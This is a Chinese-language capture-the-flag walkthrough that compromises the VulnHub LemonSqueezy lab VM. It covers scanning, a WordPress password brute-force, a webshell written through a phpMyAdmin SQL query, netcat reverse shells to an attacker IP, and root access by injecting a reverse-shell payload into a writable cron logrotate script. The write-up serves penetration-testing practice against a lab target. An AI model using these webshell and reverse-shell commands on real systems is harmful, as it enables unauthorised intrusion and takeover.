虚拟机下载地址:https://www.vulnhub.com/entry/lemonsqueezy-1,473/
虚拟机简介:这是一个初学者的 boot2root 风格
目标:1个flag
级别:初级
arp-scan 192.168.207.0/24
nmap -A -sS -sV -v -p- 192.168.207.134
查看开放80端口
访问站点显示Apache默认页面
使用dirb进行目录扫描,发现WordPress和pypmyadmin
dirb http://192.168.207.139
扫描到该站点2个账号
wpscan --url "http://192.168.207.139/wordpress/" -eu
爆破WordPress账号和密码,只爆破到账号orange的密码为ginger
wpscan --url "http://192.168.207.139/wordpress/" -U orange -P /usr/share/wordlists/rockyou.txt
登录时提示域名为lemonsqueezy,需要绑定hosts
访问以后在草稿箱中发现用户密码,密码为: [email protected]!
使用账号orange,密码[email protected]!成功登录到PHPmyadmin页面
创建SQL查询写入webshell木马
SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/wordpress/shell.php"
测试访问webshell执行命令,已经成功写入
反弹shell连接
nc -e /bin/bash 192.168.207.130 4444
获取到反弹shell连接
python -c 'import pty; pty.spawn("/bin/bash")'
在网站中发现有一个计划任务是以root身份启动,并且存在可以写入的权限
cat /etc/crontab
ls -lah | /etc/logrotate.d/logrotate
使用MSF创建的shell写入到脚本中
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.207.130 lport=4444 R
echo "mkfifo /tmp/gzgujwr; nc 192.168.207.130 4444 0</tmp/gzgujwr | /bin/sh >/tmp/gzgujwr 2>&1; rm /tmp/gzgujwr" > /etc/logrotate.d/logrotate
echo "chmod +s /usr/bin/bash"
获取到反弹shell连接
cd /root
cat root.txt